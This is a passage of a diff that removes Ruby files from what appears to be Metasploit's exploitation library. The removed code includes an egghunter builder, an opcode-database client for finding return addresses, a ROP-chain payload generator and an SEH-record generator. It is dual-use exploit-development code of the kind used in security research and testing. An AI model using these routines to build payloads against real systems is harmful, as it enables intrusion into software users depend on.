||||
this_egg << [cksum & 0xff].pack('C')
|
||||
end
|
||||
|
||||
this_egg = egg_prep + this_egg
|
||||
eggs << this_egg
|
||||
|
||||
eggcnt -= 1
|
||||
startcode += eggsize
|
||||
end
|
||||
|
||||
return [ the_omelet, eggs ]
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# Stub method that is meant to be overridden. It returns the raw stub that
|
||||
# should be used as the omelet maker (combine the eggs).
|
||||
#
|
||||
def hunter_stub
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,819 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rexml/rexml'
|
||||
require 'rexml/source'
|
||||
require 'rexml/document'
|
||||
require 'rexml/parsers/treeparser'
|
||||
require 'rex/proto/http'
|
||||
require 'uri'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
module OpcodeDb
|
||||
|
||||
module OpcodeResult # :nodoc:
|
||||
def initialize(hash)
|
||||
@hash = hash
|
||||
end
|
||||
attr_reader :hash
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# A cachable entry.
|
||||
#
|
||||
###
|
||||
module Cachable
|
||||
|
||||
def create(hash) # :nodoc:
|
||||
@Cache = {} unless (@Cache)
|
||||
if (hash_key(hash) and @Cache[hash_key(hash)])
|
||||
@Cache[hash_key(hash)]
|
||||
else
|
||||
@Cache[hash_key(hash)] = self.new(hash)
|
||||
end
|
||||
end
|
||||
|
||||
def hash_key(hash) # :nodoc:
|
||||
hash['id'] || nil
|
||||
end
|
||||
|
||||
def flush_cache # :nodoc:
|
||||
@Cache.clear
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides a general interface to items that come from that opcode
|
||||
# database that have a symbolic entry identifier and name.
|
||||
#
|
||||
###
|
||||
module DbEntry
|
||||
include OpcodeResult
|
||||
|
||||
def initialize(hash)
|
||||
super
|
||||
|
||||
@id = hash['id'].to_i
|
||||
@name = hash['name']
|
||||
end
|
||||
|
||||
#
|
||||
# Fields that could possibly be filtered on for this database entry.
|
||||
#
|
||||
def filter_hash
|
||||
{
|
||||
"id" => id,
|
||||
"name" => name
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# The unique server identifier.
|
||||
#
|
||||
attr_reader :id
|
||||
#
|
||||
# The unique name for this entry.
|
||||
#
|
||||
attr_reader :name
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class represents a particular image module including its name,
|
||||
# segments, imports, exports, base address, and so on.
|
||||
#
|
||||
###
|
||||
class ImageModule
|
||||
include DbEntry
|
||||
|
||||
###
|
||||
#
|
||||
# This class contains information about a module-associated segment.
|
||||
#
|
||||
###
|
||||
class Segment
|
||||
def initialize(hash)
|
||||
@type = hash['type']
|
||||
@base_address = hash['base_address'].to_i
|
||||
@size = hash['segment_size'].to_i
|
||||
@writable = hash['writable'] == "true" ? true : false
|
||||
@readable = hash['readable'] == "true" ? true : false
|
||||
@executable = hash['executable'] == "true" ? true : false
|
||||
end
|
||||
|
||||
#
|
||||
# The type of the segment, such as ".text".
|
||||
#
|
||||
attr_reader :type
|
||||
#
|
||||
# The base address of the segment.
|
||||
#
|
||||
attr_reader :base_address
|
||||
#
|
||||
# The size of the segment in bytes.
|
||||
#
|
||||
attr_reader :size
|
||||
#
|
||||
# Boolean that indicates whether or not the segment is writable.
|
||||
#
|
||||
attr_reader :writable
|
||||
#
|
||||
# Boolean that indicates whether or not the segment is readable.
|
||||
#
|
||||
attr_reader :readable
|
||||
#
|
||||
# Boolean that indicates whether or not the segment is executable.
|
||||
#
|
||||
attr_reader :executable
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class contains information about a module-associated import.
|
||||
#
|
||||
###
|
||||
class Import
|
||||
def initialize(hash)
|
||||
@name = hash['name']
|
||||
@address = hash['address'].to_i
|
||||
@ordinal = hash['ordinal'].to_i
|
||||
end
|
||||
|
||||
#
|
||||
# The name of the imported function.
|
||||
#
|
||||
attr_reader :name
|
||||
#
|
||||
# The address of the function pointer in the IAT.
|
||||
#
|
||||
attr_reader :address
|
||||
#
|
||||
# The ordinal of the imported symbol.
|
||||
#
|
||||
attr_reader :ordinal
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class contains information about a module-associated export.
|
||||
#
|
||||
###
|
||||
class Export
|
||||
def initialize(hash)
|
||||
@name = hash['name']
|
||||
@address = hash['address'].to_i
|
||||
@ordinal = hash['ordinal'].to_i
|
||||
end
|
||||
|
||||
#
|
||||
# The name of the exported function.
|
||||
#
|
||||
attr_reader :name
|
||||
#
|
||||
# The address of the exported function.
|
||||
#
|
||||
attr_reader :address
|
||||
#
|
||||
# The ordinal of the exported symbol.
|
||||
#
|
||||
attr_reader :ordinal
|
||||
end
|
||||
|
||||
class <<self
|
||||
include Cachable
|
||||
def hash_key(hash) # :nodoc:
|
||||
(hash['id'] || '') +
|
||||
(hash['segments'] || '').to_s +
|
||||
(hash['exports'] || '').to_s +
|
||||
(hash['imports'] || '').to_s
|
||||
end
|
||||
end
|
||||
|
||||
def initialize(hash)
|
||||
super
|
||||
|
||||
@locale = Locale.create(hash['locale'])
|
||||
@maj_maj_ver = hash['maj_maj_ver'].to_i
|
||||
@maj_min_ver = hash['maj_min_ver'].to_i
|
||||
@min_maj_ver = hash['min_maj_ver'].to_i
|
||||
@min_min_ver = hash['min_min_ver'].to_i
|
||||
@timestamp = Time.at(hash['timestamp'].to_i)
|
||||
@vendor = hash['vendor']
|
||||
@base_address = hash['base_address'].to_i
|
||||
@image_size = hash['image_size'].to_i
|
||||
|
||||
@segments = hash['segments'].map { |ent|
|
||||
Segment.new(ent)
|
||||
} if (hash['segments'])
|
||||
@imports = hash['imports'].map { |ent|
|
||||
Import.new(ent)
|
||||
} if (hash['imports'])
|
||||
@exports = hash['exports'].map { |ent|
|
||||
Export.new(ent)
|
||||
} if (hash['exports'])
|
||||
@platforms = hash['platforms'].map { |ent|
|
||||
OsVersion.create(ent)
|
||||
} if (hash['platforms'])
|
||||
|
||||
@segments = [] unless(@segments)
|
||||
@imports = [] unless(@imports)
|
||||
@exports = [] unless(@exports)
|
||||
@platforms = [] unless(@platforms)
|
||||
end
|
||||
|
||||
#
|
||||
# An instance of a Locale class that is associated with this module.
|
||||
#
|
||||
attr_reader :locale
|
||||
#
|
||||
# The module's major major version number (X.x.x.x).
|
||||
#
|
||||
attr_reader :maj_maj_ver
|
||||
#
|
||||
# The module's major minor version number (x.X.x.x).
|
||||
#
|
||||
attr_reader :maj_min_ver
|
||||
#
|
||||
# The module's minor major version number (x.x.X.x).
|
||||
#
|
||||
attr_reader :min_maj_ver
|
||||
#
|
||||
# The module's minor minor version number (x.x.x.X).
|
||||
#
|
||||
attr_reader :min_min_ver
|
||||
#
|
||||
# The timestamp that the image was compiled (as a Time instance).
|
||||
#
|
||||
attr_reader :timestamp
|
||||
#
|
||||
# The vendor that created the module.
|
||||
#
|
||||
attr_reader :vendor
|
||||
#
|
||||
# The preferred base address at which the module will load.
|
||||
#
|
||||
attr_reader :base_address
|
||||
#
|
||||
# The size of the image mapping associated with the module in bytes.
|
||||
#
|
||||
attr_reader :image_size
|
||||
#
|
||||
# An array of Segment instances.
|
||||
#
|
||||
attr_reader :segments
|
||||
#
|
||||
# An array of Import instances.
|
||||
#
|
||||
attr_reader :imports
|
||||
#
|
||||
# An array of Export instances.
|
||||
#
|
||||
attr_reader :exports
|
||||
#
|
||||
# An array of OsVersion instances.
|
||||
#
|
||||
attr_reader :platforms
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class contains information about a specific locale, such as English.
|
||||
#
|
||||
###
|
||||
class Locale
|
||||
include DbEntry
|
||||
class <<self
|
||||
include Cachable
|
||||
end
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class contains information about a platform (operating system) version.
|
||||
#
|
||||
###
|
||||
class OsVersion
|
||||
include DbEntry
|
||||
|
||||
class <<self
|
||||
include Cachable
|
||||
def hash_key(hash)
|
||||
hash['id'] + (hash['modules'] || '')
|
||||
end
|
||||
end
|
||||
|
||||
def initialize(hash)
|
||||
super
|
||||
|
||||
@modules = (hash['modules']) ? hash['modules'].to_i : 0
|
||||
@desc = hash['desc']
|
||||
@arch = hash['arch']
|
||||
@maj_ver = hash['maj_ver'].to_i
|
||||
@min_ver = hash['min_ver'].to_i
|
||||
@maj_patch_level = hash['maj_patch_level'].to_i
|
||||
@min_patch_level = hash['min_patch_level'].to_i
|
||||
end
|
||||
|
||||
#
|
||||
# The number of modules that exist in this operating system version.
|
||||
#
|
||||
attr_reader :modules
|
||||
#
|
||||
# The operating system version description, such as Windows XP 5.2.0.0
|
||||
# (IA32).
|
||||
#
|
||||
attr_reader :desc
|
||||
#
|
||||
# The architecture that the operating system version runs on, such as IA32.
|
||||
#
|
||||
attr_reader :arch
|
||||
#
|
||||
# The major version of the operating system version.
|
||||
#
|
||||
attr_reader :maj_ver
|
||||
#
|
||||
# The minor version of the operating system version.
|
||||
#
|
||||
attr_reader :min_ver
|
||||
#
|
||||
# The major patch level of the operating system version, such as a service
|
||||
# pack.
|
||||
#
|
||||
attr_reader :maj_patch_level
|
||||
#
|
||||
# The minor patch level of the operating system version.
|
||||
#
|
||||
attr_reader :min_patch_level
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# An opcode group (esp => eip).
|
||||
#
|
||||
###
|
||||
class Group
|
||||
include DbEntry
|
||||
class <<self
|
||||
include Cachable
|
||||
end
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# An opcode type (jmp esp).
|
||||
#
|
||||
###
|
||||
class Type
|
||||
include DbEntry
|
||||
|
||||
class <<self
|
||||
include Cachable
|
||||
end
|
||||
|
||||
def initialize(hash)
|
||||
super
|
||||
|
||||
@opcodes = (hash['opcodes']) ? hash['opcodes'].to_i : 0
|
||||
@meta_type = MetaType.create(hash['meta_type']) if (hash['meta_type'])
|
||||
@group = Group.create(hash['group']) if (hash['group'])
|
||||
@arch = hash['arch']
|
||||
end
|
||||
|
||||
#
|
||||
# The number of opcodes associated with this type, or 0 if this information
|
||||
# is not available.
|
||||
#
|
||||
attr_reader :opcodes
|
||||
#
|
||||
# An instance of the MetaType to which this opcode type belongs, or nil.
|
||||
#
|
||||
attr_reader :meta_type
|
||||
#
|
||||
# An instance of the Group to which this opcode type belongs, or nil.
|
||||
#
|
||||
attr_reader :group
|
||||
#
|
||||
# The architecture that this opcode type is associated with.
|
||||
#
|
||||
attr_reader :arch
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# An opcode meta type (jmp reg).
|
||||
#
|
||||
###
|
||||
class MetaType
|
||||
include DbEntry
|
||||
class <<self
|
||||
include Cachable
|
||||
end
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# An opcode that has a specific address and is associated with one or more
|
||||
# modules.
|
||||
#
|
||||
###
|
||||
class Opcode
|
||||
include DbEntry
|
||||
|
||||
def initialize(hash)
|
||||
super
|
||||
|
||||
@address = hash['address'].to_i
|
||||
@type = Type.create(hash['type'])
|
||||
@group = @type.group
|
||||
@modules = hash['modules'].map { |ent|
|
||||
ImageModule.create(ent)
|
||||
} if (hash['modules'])
|
||||
|
||||
@modules = [] unless(@modules)
|
||||
end
|
||||
|
||||
#
|
||||
# The address of the opcode.
|
||||
#
|
||||
attr_reader :address
|
||||
#
|
||||
# The type of the opcode indicating which instruction is found at the
|
||||
# address. This is an instance of the Type class.
|
||||
#
|
||||
attr_reader :type
|
||||
#
|
||||
# A Group instance that reflects the group to which the opcode type found
|
||||
# at the instance's address belongs.
|
||||
#
|
||||
attr_reader :group
|
||||
#
|
||||
# An array of ImageModule instances that show the modules that contain this
|
||||
# address.
|
||||
#
|
||||
attr_reader :modules
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# Current statistics of the opcode database.
|
||||
#
|
||||
###
|
||||
class Statistics
|
||||
def initialize(hash)
|
||||
@modules = hash['modules'].to_i
|
||||
@opcodes = hash['opcodes'].to_i
|
||||
@opcode_types = hash['opcode_types'].to_i
|
||||
@platforms = hash['platforms'].to_i
|
||||
@architectures = hash['architectures'].to_i
|
||||
@module_segments = hash['module_segments'].to_i
|
||||
@module_imports = hash['module_imports'].to_i
|
||||
@module_exports = hash['module_exports'].to_i
|
||||
@last_update = Time.at(hash['last_update'].to_i)
|
||||
end
|
||||
|
||||
#
|
||||
# The number of modules found within the opcode database.
|
||||
#
|
||||
attr_reader :modules
|
||||
#
|
||||
# The number of opcodes supported by the opcode database.
|
||||
#
|
||||
attr_reader :opcodes
|
||||
#
|
||||
# The number of opcode types supported by the database.
|
||||
#
|
||||
attr_reader :opcode_types
|
||||
#
|
||||
# The number of platforms supported by the database.
|
||||
#
|
||||
attr_reader :platforms
|
||||
#
|
||||
# The number of architectures supported by the database.
|
||||
#
|
||||
attr_reader :architectures
|
||||
#
|
||||
# The number of module segments supported by the database.
|
||||
#
|
||||
attr_reader :module_segments
|
||||
#
|
||||
# The number of module imports supported by the database.
|
||||
#
|
||||
attr_reader :module_imports
|
||||
#
|
||||
# The number of module exports supported by the database.
|
||||
#
|
||||
attr_reader :module_exports
|
||||
#
|
||||
# The time at which the last database update occurred.
|
||||
#
|
||||
attr_reader :last_update
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class implements a client interface to the Metasploit Opcode Database.
|
||||
# It is intended to be used as a method of locating reliable return addresses
|
||||
# given a set of executable files and a set of usable opcodes.
|
||||
#
|
||||
###
|
||||
class Client
|
||||
|
||||
DefaultServerHost = "www.metasploit.com"
|
||||
DefaultServerPort = 80
|
||||
DefaultServerUri = "/users/opcode/msfopcode_server.cgi"
|
||||
|
||||
#
|
||||
# Returns an instance of an initialized client that will use the supplied
|
||||
# server values.
|
||||
#
|
||||
def initialize(host = DefaultServerHost, port = DefaultServerPort, uri = DefaultServerUri)
|
||||
self.server_host = host
|
||||
self.server_port = port
|
||||
self.server_uri = uri
|
||||
end
|
||||
|
||||
#
|
||||
# Disables response parsing.
|
||||
#
|
||||
def disable_parse
|
||||
@disable_parse = true
|
||||
end
|
||||
|
||||
#
|
||||
# Enables response parsing.
|
||||
#
|
||||
def enable_parse
|
||||
@disable_parse = false
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of MetaType instances.
|
||||
#
|
||||
def meta_types
|
||||
request('meta_types').map { |ent| MetaType.create(ent) }
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of Group instances.
|
||||
#
|
||||
def groups
|
||||
request('groups').map { |ent| Group.create(ent) }
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of Type instances. Opcode types are specific opcodes,
|
||||
# such as a jmp esp. Optionally, a filter hash can be passed to include
|
||||
# extra information in the results.
|
||||
#
|
||||
# Statistics (Bool)
|
||||
#
|
||||
# If this hash element is set to true, the number of opcodes currently in
|
||||
# the database of this type will be returned.
|
||||
#
|
||||
def types(filter = {})
|
||||
request('types', filter).map { |ent| Type.create(ent) }
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of OsVersion instances. OS versions are associated with
|
||||
# a particular operating system release (including service packs).
|
||||
# Optionally, a filter hash can be passed to limit the number of results
|
||||
# returned. If no filter hash is supplied, all results are returned.
|
||||
#
|
||||
# Names (Array)
|
||||
#
|
||||
# If this hash element is specified, only the operating systems that
|
||||
# contain one or more of the names specified will be returned.
|
||||
#
|
||||
# Statistics (Bool)
|
||||
#
|
||||
# If this hash element is set to true, the number of modules associated
|
||||
# with this matched operating system versions will be returned.
|
||||
#
|
||||
def platforms(filter = {})
|
||||
request('platforms', filter).map { |ent| OsVersion.create(ent) }
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of ImageModule instances. Image modules are
|
||||
# version-specific, locale-specific, and operating system version specific
|
||||
# image files. Modules have opcodes, segments, imports and exports
|
||||
# associated with them. Optionally, a filter hash can be specified to
|
||||
# limit the number of results returned from the database. If no filter
|
||||
# hash is supplied, all modules will be returned.
|
||||
#
|
||||
# LocaleNames (Array)
|
||||
#
|
||||
# This hash element limits results to one or more specific locale by name.
|
||||
#
|
||||
# PlatformNames (Array)
|
||||
#
|
||||
# This hash element limits results to one or more specific platform by
|
||||
# name.
|
||||
#
|
||||
# ModuleNames (Array)
|
||||
#
|
||||
# This hash element limits results to one or more specific module by name.
|
||||
#
|
||||
# Segments (Bool)
|
||||
#
|
||||
# If this hash element is set to true, the segments associated with each
|
||||
# resulting module will be returned by the server.
|
||||
#
|
||||
# Imports (Bool)
|
||||
#
|
||||
# If this hash element is set to true, the imports associated with each
|
||||
# resulting module will be returned by the server.
|
||||
#
|
||||
# Exports (Bool)
|
||||
#
|
||||
# If this hash element is set to true, the exports associated with each
|
||||
# resulting module will be returned by the server.
|
||||
#
|
||||
def modules(filter = {})
|
||||
request('modules', filter).map { |ent| ImageModule.create(ent) }
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of Locale instances that are supported by the server.
|
||||
#
|
||||
def locales
|
||||
request('locales').map { |ent| Locale.create(ent) }
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of Opcode instances that match the filter limitations
|
||||
# specified in the supplied filter hash. If no filter hash is specified,
|
||||
# all opcodes will be returned (but are most likely going to be limited by
|
||||
# the server). The filter hash limiters that can be specified are:
|
||||
#
|
||||
# ModuleNames (Array)
|
||||
#
|
||||
# This hash element limits results to one or more specific modules by
|
||||
# name.
|
||||
#
|
||||
# GroupNames (Array)
|
||||
#
|
||||
# This hash element limits results to one or more specific opcode group by
|
||||
# name.
|
||||
#
|
||||
# TypeNames (Array)
|
||||
#
|
||||
# This hash element limits results to one or more specific opcode type by
|
||||
# name.
|
||||
#
|
||||
# MetaTypeNames (Array)
|
||||
#
|
||||
# This hash element limits results to one or more specific opcode meta
|
||||
# type by name.
|
||||
#
|
||||
# LocaleNames (Array)
|
||||
#
|
||||
# Limits results to one or more specific locale by name.
|
||||
#
|
||||
# PlatformNames (Array)
|
||||
#
|
||||
# Limits reslts to one or more specific operating system version by name.
|
||||
#
|
||||
# Addresses (Array)
|
||||
#
|
||||
# Limits results to a specific set of addresses.
|
||||
#
|
||||
# Portable (Bool)
|
||||
#
|
||||
# If this hash element is true, opcode results will be limited to ones
|
||||
# that span more than one operating system version.
|
||||
#
|
||||
def search(filter = {})
|
||||
request('search', filter).map { |ent| Opcode.new(ent) }
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an instance of the Statistics class that holds information about
|
||||
# the server's database stats.
|
||||
#
|
||||
def statistics
|
||||
Statistics.new(request('statistics'))
|
||||
end
|
||||
|
||||
#
|
||||
# These attributes convey information about the remote server and can be
|
||||
# changed in order to point it to a locate copy as necessary.
|
||||
#
|
||||
attr_accessor :server_host, :server_port, :server_uri
|
||||
|
||||
#
|
||||
# Retrieves the last raw XML response to be processed.
|
||||
#
|
||||
attr_reader :last_xml
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# Transmits a request to the Opcode database server and translates the
|
||||
# response into a native general ruby datatype.
|
||||
#
|
||||
def request(method, opts = {})
|
||||
client = Rex::Proto::Http::Client.new(server_host, server_port)
|
||||
|
||||
begin
|
||||
|
||||
# Create the CGI parameter list
|
||||
vars = { 'method' => method }
|
||||
|
||||
opts.each_pair do |k, v|
|
||||
vars[k] = xlate_param(v)
|
||||
end
|
||||
|
||||
client.set_config('uri_encode_mode' => 'none')
|
||||
|
||||
# Initialize the request with the POST body.
|
||||
request = client.request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => server_uri,
|
||||
'vars_post' => vars
|
||||
)
|
||||
|
||||
# Send the request and grab the response.
|
||||
response = client.send_recv(request, 300)
|
||||
|
||||
# Non-200 return code?
|
||||
if (response.code != 200)
|
||||
raise RuntimeError, "Invalid response received from server."
|
||||
end
|
||||
|
||||
# Convert the return value to the native type.
|
||||
parse_response(response.body)
|
||||
rescue ::SocketError
|
||||
raise RuntimeError, "Could not communicate with the opcode service: #{$!.class} #{$!}"
|
||||
ensure
|
||||
client.close
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Translates a parameter into a flat CGI parameter string.
|
||||
#
|
||||
def xlate_param(v)
|
||||
if (v.kind_of?(Array))
|
||||
v.map { |ent|
|
||||
xlate_param(ent)
|
||||
}.join(',,')
|
||||
elsif (v.kind_of?(Hash))
|
||||
v.map { |k,v|
|
||||
"#{URI.escape(k)}:#{xlate_param(v)}" if (v)
|
||||
}.join(',,')
|
||||
else
|
||||
URI.escape(v.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Translate the data type from a flat string to a ruby native type.
|
||||
#
|
||||
def parse_response(xml)
|
||||
@last_xml = xml
|
||||
|
||||
if (!@disable_parse)
|
||||
source = REXML::Source.new(xml)
|
||||
doc = REXML::Document.new
|
||||
|
||||
REXML::Parsers::TreeParser.new(source, doc).parse
|
||||
|
||||
translate_element(doc.root)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Translate elements conveyed as data types.
|
||||
#
|
||||
def translate_element(element)
|
||||
case element.name
|
||||
when "Array"
|
||||
return element.elements.map { |child| translate_element(child) }
|
||||
when "Hash"
|
||||
hsh = {}
|
||||
|
||||
element.each_element { |child|
|
||||
if (e = child.elements[1])
|
||||
v = translate_element(e)
|
||||
else
|
||||
v = child.text
|
||||
end
|
||||
|
||||
hsh[child.attributes['name']] = v
|
||||
}
|
||||
|
||||
return hsh
|
||||
else
|
||||
return element.text
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,190 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/text'
|
||||
require 'rexml/document'
|
||||
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides methods to access the ROP database, in order to generate
|
||||
# a ROP-compatible payload on the fly.
|
||||
#
|
||||
###
|
||||
class RopDb
|
||||
def initialize
|
||||
@base_path = File.join(File.dirname(__FILE__), '../../../data/ropdb/')
|
||||
end
|
||||
|
||||
public
|
||||
|
||||
|
||||
#
|
||||
# Returns true if a ROP chain is available, otherwise false
|
||||
#
|
||||
def has_rop?(rop_name)
|
||||
File.exist?(File.join(@base_path, "#{rop_name}.xml"))
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
|
||||
# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
|
||||
# :unsafe_negate_size, and :safe_negate_size
|
||||
# Note if no RoP is found, it returns an empry array.
|
||||
# Arguments:
|
||||
# rop_name - name of the ROP chain.
|
||||
# opts - A hash of optional arguments:
|
||||
# 'target' - A regex string search against the compatibility list.
|
||||
# 'base' - Specify a different base for the ROP gadgets.
|
||||
#
|
||||
def select_rop(rop, opts={})
|
||||
target = opts['target'] || ''
|
||||
base = opts['base'] || nil
|
||||
|
||||
raise RuntimeError, "#{rop} ROP chain is not available" if not has_rop?(rop)
|
||||
xml = load_rop(File.join(@base_path, "#{rop}.xml"))
|
||||
|
||||
gadgets = []
|
||||
|
||||
xml.elements.each("db/rop") { |e|
|
||||
name = e.attributes['name']
|
||||
next if not has_target?(e, target)
|
||||
|
||||
if not base
|
||||
default = e.elements['gadgets'].attributes['base'].scan(/^0x([0-9a-f]+)$/i).flatten[0]
|
||||
base = default.to_i(16)
|
||||
end
|
||||
|
||||
gadgets << parse_gadgets(e, base)
|
||||
}
|
||||
return gadgets.flatten
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Returns a payload with the user-supplied stack-pivot, a ROP chain,
|
||||
# and then shellcode.
|
||||
# Arguments:
|
||||
# rop - Name of the ROP chain
|
||||
# payload - Payload in binary
|
||||
# opts - A hash of optional arguments:
|
||||
# 'nop' - Used to generate nops with generate_sled()
|
||||
# 'badchars' - Used in a junk gadget
|
||||
# 'pivot' - Stack pivot in binary
|
||||
# 'target' - A regex string search against the compatibility list.
|
||||
# 'base' - Specify a different base for the ROP gadgets.
|
||||
#
|
||||
def generate_rop_payload(rop, payload, opts={})
|
||||
nop = opts['nop'] || nil
|
||||
badchars = opts['badchars'] || ''
|
||||
pivot = opts['pivot'] || ''
|
||||
target = opts['target'] || ''
|
||||
base = opts['base'] || nil
|
||||
|
||||
rop = select_rop(rop, {'target'=>target, 'base'=>base})
|
||||
# Replace the reserved words with actual gadgets
|
||||
rop = rop.map {|e|
|
||||
if e == :nop
|
||||
sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
|
||||
elsif e == :junk
|
||||
Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
|
||||
elsif e == :size
|
||||
payload.length
|
||||
elsif e == :unsafe_negate_size
|
||||
get_unsafe_size(payload.length)
|
||||
elsif e == :safe_negate_size
|
||||
get_safe_size(payload.length)
|
||||
else
|
||||
e
|
||||
end
|
||||
}.pack("V*")
|
||||
|
||||
raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
|
||||
|
||||
return pivot + rop + payload
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
|
||||
#
|
||||
# Returns a size that's safe from null bytes.
|
||||
# This function will keep incrementing the value of "s" until it's safe from null bytes.
|
||||
#
|
||||
def get_safe_size(s)
|
||||
safe_size = get_unsafe_size(s)
|
||||
while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
|
||||
safe_size -= 1
|
||||
end
|
||||
|
||||
safe_size
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Returns a size that might contain one or more null bytes
|
||||
#
|
||||
def get_unsafe_size(s)
|
||||
0xffffffff - s + 1
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Checks if a ROP chain is compatible
|
||||
#
|
||||
def has_target?(rop, target)
|
||||
rop.elements.each('compatibility/target') { |t|
|
||||
return true if t.text =~ /#{target}/i
|
||||
}
|
||||
return false
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the database in XML
|
||||
#
|
||||
def load_rop(file_path)
|
||||
f = File.open(file_path, 'rb')
|
||||
xml = REXML::Document.new(f.read(f.stat.size))
|
||||
f.close
|
||||
return xml
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Returns gadgets
|
||||
#
|
||||
def parse_gadgets(e, image_base)
|
||||
gadgets = []
|
||||
e.elements.each('gadgets/gadget') { |g|
|
||||
offset = g.attributes['offset']
|
||||
value = g.attributes['value']
|
||||
|
||||
if offset
|
||||
addr = offset.scan(/^0x([0-9a-f]+)$/i).flatten[0]
|
||||
gadgets << (image_base + addr.to_i(16))
|
||||
elsif value
|
||||
case value
|
||||
when 'nop'
|
||||
gadgets << :nop
|
||||
when 'junk'
|
||||
gadgets << :junk
|
||||
when 'size'
|
||||
gadgets << :size
|
||||
when 'unsafe_negate_size'
|
||||
gadgets << :unsafe_negate_size
|
||||
when 'safe_negate_size'
|
||||
gadgets << :safe_negate_size
|
||||
else
|
||||
gadgets << value.to_i(16)
|
||||
end
|
||||
else
|
||||
raise RuntimeError, "Missing offset or value attribute in '#{name}'"
|
||||
end
|
||||
}
|
||||
return gadgets
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,93 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/text'
|
||||
require 'rex/arch/x86'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides methods for generating SEH registration records
|
||||
# in a dynamic and flexible fashion. The records can be generated with
|
||||
# the short jump at a random offset into the next pointer and with random
|
||||
# padding in between the handler and the attacker's payload.
|
||||
#
|
||||
###
|
||||
class Seh
|
||||
|
||||
#
|
||||
# Creates a new instance of the class and initializes it with the supplied
|
||||
# bad character list. The space argument denotes how much room is
|
||||
# available for random padding and the NOP argument can be used to generate
|
||||
# a random NOP sled that is better than 0x90.
|
||||
#
|
||||
def initialize(badchars = nil, space = nil, nop = nil)
|
||||
self.badchars = badchars || ''
|
||||
self.space = (space && space > 121) ? 121 : space
|
||||
self.nop = nop
|
||||
end
|
||||
|
||||
#
|
||||
# Generates an SEH record
|
||||
#
|
||||
def generate_seh_record(handler, dynamic=false)
|
||||
if (dynamic)
|
||||
generate_dynamic_seh_record(handler)
|
||||
else
|
||||
generate_static_seh_record(handler)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Generates a fake SEH registration record with the supplied handler
|
||||
# address for the handler, and a nop generator to use when generating
|
||||
# padding inside the next pointer. The NOP generator must implement the
|
||||
# 'generate_sled' method that takes a length and a list of bad
|
||||
# characters.
|
||||
#
|
||||
def generate_dynamic_seh_record(handler)
|
||||
|
||||
# Generate the padding up to the size specified or 121 characters
|
||||
# maximum to account for the maximum range of a short jump plus the
|
||||
# record size.
|
||||
pad = rand(space || 121)
|
||||
rsize = pad + 8
|
||||
|
||||
# Calculate the random index into the next ptr to store the short jump
|
||||
# instruction
|
||||
jmpidx = rand(3)
|
||||
|
||||
# Build the prefixed sled for the bytes that come before the short jump
|
||||
# instruction
|
||||
sled = (nop) ? nop.generate_sled(jmpidx, badchars) : ("\x90" * jmpidx)
|
||||
|
||||
# Seed the record and any space after the record with random text
|
||||
record = Rex::Text.rand_text(rsize, badchars)
|
||||
|
||||
# Build the next pointer and short jump instruction
|
||||
record[jmpidx, 2] = Rex::Arch::X86.jmp_short((rsize - jmpidx) - 2)
|
||||
record[0, jmpidx] = sled
|
||||
|
||||
# Set the handler in the registration record
|
||||
record[4, 4] = [ handler ].pack('V')
|
||||
|
||||
# Return the generated record to the caller
|
||||
record
|
||||
end
|
||||
|
||||
#
|
||||
# Generates a static SEH registration record with a specific handler and
|
||||
# next pointer.
|
||||
#
|
||||
def generate_static_seh_record(handler)
|
||||
